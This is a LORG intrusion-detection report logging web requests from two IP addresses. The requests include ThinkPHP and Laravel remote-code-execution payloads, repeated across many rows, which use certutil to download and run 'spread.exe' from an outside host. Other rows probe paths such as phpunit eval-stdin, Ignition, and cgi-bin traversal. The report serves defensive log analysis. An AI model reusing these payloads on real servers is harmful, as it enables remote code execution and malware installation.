LORG Detection Results [lorg]

Summary: 5 incidents discovered from 2 clients

59.21.5.248 | 4 incidents | impact ∑: 100

attacks only

Description: A targeted scan from Korea, Republic of 15 hours ago. A total of 4 incidents where discovered by phpids detection modules. The incident happened during unusual working hours in Korea, so it might be carried out by a hobbyist on caffeine.

Impact	Tags	Remote-City	Remote-Host	Remote-Logname	Remote-User	Date	Request	Final-Status	Bytes-Sent	Referer	User-Agent
0	none	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:10 +0100	GET / HTTP/1.1	302	459	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
0	none	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:11 +0100	GET /index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c certutil -urlcache -split -f http://59.21.5.248:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe HTTP/1.1	302	946	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
0	none	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:11 +0100	GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c certutil -urlcache -split -f http://59.21.5.248:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe HTTP/1.1	302	960	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
0	none	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:12 +0100	GET /index.php?s=index/\\think\\Container/invokeFunction&function=call_user_func_array&vars[]=system&vars[1][]=cmd.exe /c certutil -urlcache -split -f http://59.21.5.248:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe HTTP/1.1	302	958	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
0	none	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:12 +0100	GET /public/index.php?s=index/\\think\\Container/invokeFunction&function=call_user_func_array&vars[]=system&vars[1][]=cmd.exe /c certutil -urlcache -split -f http://59.21.5.248:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe HTTP/1.1	302	972	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
0	none	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:13 +0100	GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cmd.exe /c certutil -urlcache -split -f http://59.21.5.248:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe HTTP/1.1	302	966	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
0	none	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:13 +0100	GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cmd.exe /c certutil -urlcache -split -f http://59.21.5.248:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe HTTP/1.1	302	980	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
15	dt id lfi xss csrf	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:14 +0100	GET /index.php?s=/../\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c certutil -urlcache -split -f http://59.21.5.248:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe HTTP/1.1	302	952	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
15	dt id lfi xss csrf	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:14 +0100	GET /public/index.php?s=/../\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c certutil -urlcache -split -f http://59.21.5.248:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe HTTP/1.1	302	966	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
0	none	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:15 +0100	POST /?s=captcha HTTP/1.1	302	442	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
0	none	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:15 +0100	POST /user/register?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1	400	-	-	-
35	xss csrf dt id lfi rfe sqli	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:15 +0100	GET /public/index.php/index?code=O:44:"Illuminate\Foundation\Testing\PendingCommand":4:{s:10:"command";s:6:"system";s:13:"parameters";a:1:{i:0;s:2:"cmd.exe /c certutil -urlcache -split -f http://59.21.5.248:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe";}s:6:"app";O:33:"Illuminate\Foundation\Application":2:{s:22:"hasBeenBootstrapped";b:0;s:11:"bindings";a:1:{s:35:"Illuminate\Contracts\Console\Kernel";a:1:{s:8:"concrete";s:33:"Illuminate\Foundation\Application";}}}s:4:"test";O:27:"Illuminate\Auth\GenericUser":1:{s:13:"attributes";a:2:{s:14:"expectedOutput";a:1:{i:0;s:1:"1";}s:17:"expectedQuestions";a:1:{i:0;s:1:"1";}}}} HTTP/1.1	302	2473	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
35	xss csrf dt id lfi rfe sqli	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:16 +0100	GET /index.php/index?code=O:44:"Illuminate\Foundation\Testing\PendingCommand":4:{s:10:"command";s:6:"system";s:13:"parameters";a:1:{i:0;s:2:"cmd.exe /c certutil -urlcache -split -f http://59.21.5.248:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe";}s:6:"app";O:33:"Illuminate\Foundation\Application":2:{s:22:"hasBeenBootstrapped";b:0;s:11:"bindings";a:1:{s:35:"Illuminate\Contracts\Console\Kernel";a:1:{s:8:"concrete";s:33:"Illuminate\Foundation\Application";}}}s:4:"test";O:27:"Illuminate\Auth\GenericUser":1:{s:13:"attributes";a:2:{s:14:"expectedOutput";a:1:{i:0;s:1:"1";}s:17:"expectedQuestions";a:1:{i:0;s:1:"1";}}}} HTTP/1.1	302	2459	-	Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1
0	none	Korea, Republic of	59.21.5.248	-	-	Fri, 14 Jan 2022 14:53:16 +0100	GET / HTTP/1.1	302	-	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

45.146.165.37 | 1 incident | impact ∑: 12

attacks only

Description: A random scan and targeted scan and human attacker 22 hours ago. A total of one incident was discovered by phpids detection modules.

Impact	Tags	Remote-City	Remote-Host	Remote-Logname	Remote-User	Date	Request	Final-Status	Bytes-Sent	Referer	User-Agent
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 08:08:29 +0100	GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1	404	5505	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 09:46:01 +0100	GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1	302	5860	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 11:09:34 +0100	POST /mifs/.;/services/LogService HTTP/1.1	404	5646	https://91.223.222.18:443	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 12:05:45 +0100	GET /console/ HTTP/1.1	404	5646	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 14:05:19 +0100	GET /_ignition/execute-solution HTTP/1.1	404	5646	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 14:40:27 +0100	GET / HTTP/1.1	302	5860	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 15:16:39 +0100	GET / HTTP/1.1	302	5860	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 16:13:31 +0100	POST /cgi-bin/../../../../bin/sh HTTP/1.1	400	5678	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 20:23:17 +0100	POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1	302	522	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 20:23:17 +0100	\x16\x03\x01	400	-	-	-
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 21:06:27 +0100	GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1	302	522	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 21:06:28 +0100	\x16\x03\x01	400	-	-	-
12	xss csrf id rfe lfi	-	45.146.165.37	-	-	Fri, 14 Jan 2022 22:36:20 +0100	GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1	302	542	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 22:58:29 +0100	GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1	302	482	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	45.146.165.37	-	-	Fri, 14 Jan 2022 22:58:29 +0100	\x16\x03\x01	400	-	-	-